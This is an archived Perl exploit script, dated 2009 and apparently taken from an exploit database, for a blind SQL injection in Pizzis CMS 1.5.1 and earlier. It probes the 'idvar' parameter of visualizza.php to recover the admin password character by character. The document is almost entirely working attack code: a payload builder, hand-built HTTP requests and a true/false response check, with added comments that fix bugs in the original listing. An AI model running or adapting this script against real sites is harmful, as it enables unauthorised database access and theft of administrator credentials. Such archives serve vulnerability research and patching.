# Title : Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit
# Published : 2009-01-08
# Author : darkjoker
--+++=============================================================+++--
--+++====== Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit ======+++--
--+++=============================================================+++--
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;
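# Print the banner and usage text, then terminate the script.
# Called when the wrong number of arguments is supplied. The message
# ends in a newline so `die` does not append its "at ... line N" suffix.
# (The listing had lost its backslashes: "n[+]" is the escape "\n[+]".)
sub usage {
    die
        "\n[+] Pizzis CMS <= 1.5.1 Blind SQL Injection Exploit".
        "\n[+] Author: darkjoker".
        "\n[+] Site : http://darkjoker.net23.net".
        "\n[+] Usage : perl $0 <hostname> <path> <username>".
        "\n[+] Ex. : perl $0 localhost /pizziscms admin".
        "\n[+] Greetz: my girlfriend, she has no idea about what is it <3".
        "\n\n";
}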
# Build the boolean-blind probe that goes into the `idvar` GET parameter.
#   $user - admin username whose password is being recovered
#   $chr  - candidate byte as its ASCII code (an integer, not a character)
#   $pos  - 1-based offset into the `pass` column
# The leading id 98765 is presumably chosen to match no row, so whether
# the page renders a record depends only on the OR'd comparison against
# one byte of the stored password. Only spaces and single quotes are
# percent-encoded; every other character (including anything in $user)
# is sent as-is, so a username with other URL-significant characters
# would corrupt the request line.
sub query {
    my ($user, $chr, $pos) = @_;
    my $subselect = "SELECT pass FROM pizziscms_admin WHERE user = '${user}'";
    my $payload   = "98765 OR ASCII(SUBSTRING((${subselect}),${pos},1))=${chr}";
    # Minimal percent-encoding, limited to the two characters the
    # original author handled.
    my %encode_as = (' ' => '%20', "'" => '%27');
    $payload =~ s/([ '])/$encode_as{$1}/g;
    return $payload;
}
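# Send one probe request and report whether the page treated the injected
# condition as true.
#   $hostname - target host; TCP port 80 is hard-coded
#   $path     - web path of the CMS install, e.g. /pizziscms
#   $user     - admin username whose password is being recovered
#   $chr      - candidate character (a one-byte string)
#   $pos      - 1-based offset into the password column
# Returns 1 when the response body contains an <h4>...</h4> element with
# more than one character inside it (taken as "a row was rendered", i.e.
# the condition held), otherwise 0. Dies if the TCP connect fails.
# Fixes versus the archived listing: the lost escapes ("\r\n", "\s",
# "<\/h4>") are restored, and the result is read from the match itself
# instead of from a possibly stale/undefined $1.
sub exploit {
    my ($hostname, $path, $user, $chr, $pos) = @_;
    my $code = ord($chr);
    my $sock = IO::Socket::INET->new(
        PeerHost => $hostname,
        PeerPort => 80,
        Proto    => "tcp",
    ) or die "connect to ${hostname}:80 failed: $!";
    my $query = query($user, $code, $pos);
    # Hand-built HTTP/1.1 request: CRLF line ends, blank line ends the
    # headers, Connection: Close so the read loop below hits EOF.
    my $request = "GET ${path}/visualizza.php?idvar=${query} HTTP/1.1\r\n"
                . "Host: ${hostname}\r\n"
                . "Connection: Close\r\n\r\n";
    print {$sock} $request;
    my $reply = '';
    while (my $line = <$sock>) {
        $reply .= $line;
    }
    close($sock);
    # Collapse all whitespace, newlines included, so the <h4> element can
    # be matched as a single line by `.` without /s.
    $reply =~ s/\s/ /g;
    # Greedy (.+) as in the original: spans to the last </h4> on the page.
    if ($reply =~ m{<h4>(.+)</h4>}) {
        return length($1) > 1 ? 1 : 0;
    }
    return 0;
}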
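# Entry point: recover the admin password one character at a time by
# asking exploit() "is byte $pos equal to $candidate?" for each candidate
# in the charset, left to right.
usage() unless @ARGV == 3;
my ($hostname, $path, $user) = @ARGV;
# Candidate alphabet: lowercase letters and digits. It covers a hex
# digest but is broader than one; the 32-position limit below suggests
# an MD5 hex string is expected, though the listing does not confirm it.
my @key = split('', 'abcdefghijklmnopqrstuvwxyz0123456789');
# Flush each recovered character as soon as it is printed; with default
# buffering nothing is visible until the script exits.
$| = 1;
print "[+] Password: ";
POSITION:
for my $pos (1 .. 32) {
    for my $candidate (@key) {
        if (exploit($hostname, $path, $user, $candidate, $pos)) {
            print $candidate;
            next POSITION;
        }
    }
    # The original looped forever here (index ran off the end of @key and
    # ord(undef) was probed endlessly). A position that matches nothing
    # means a wrong username/path, a non-vulnerable target, or a byte
    # outside the charset; stop with what has been recovered so far.
    print "\n[-] No candidate matched at position $pos; aborting.\n";
    exit 1;
}
print "\n";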
# www.Syue.com [2009-01-08]